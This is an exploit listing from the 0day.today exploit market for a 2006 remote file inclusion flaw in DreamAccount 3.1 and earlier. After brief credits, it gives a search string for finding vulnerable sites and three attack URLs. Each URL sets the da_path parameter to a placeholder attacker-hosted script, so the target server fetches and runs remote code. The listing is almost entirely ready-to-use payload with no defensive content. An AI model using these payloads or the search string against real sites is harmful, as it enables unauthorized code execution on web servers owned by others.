[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

DreamAccount <= 3.1 (da_path) Remote File Include Vulnerabilities

Author
Aesthetico
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-493
Category
web applications
Date add
04-06-2006
Platform
unsorted
=================================================================
DreamAccount <= 3.1 (da_path) Remote File Include Vulnerabilities
=================================================================



Title: DreamAccount <= 3.1 - Remote File Include Vulnerability
-----------------------------------------------------------------
Vendor: dreamcost.com
URL: http://dreamcost.com
-----------------------------------------------------------------

Credits:
Discovered by: 'Aesthetico'
http://www.majorsecurity.de
-----------------------------------------------------------------
Search for: "powered by DreamAccount"
-----------------------------------------------------------------

Exploitation:

/auth.cookie.inc.php?da_path=http://www.yourspace.com/yourscript.php?
/auth.header.inc.php?da_path=http://www.yourspace.com/yourscript.php?
/auth.sessions.inc.php?da_path=http://www.yourspace.com/yourscript.php?




#  0day.today [2024-12-25]  #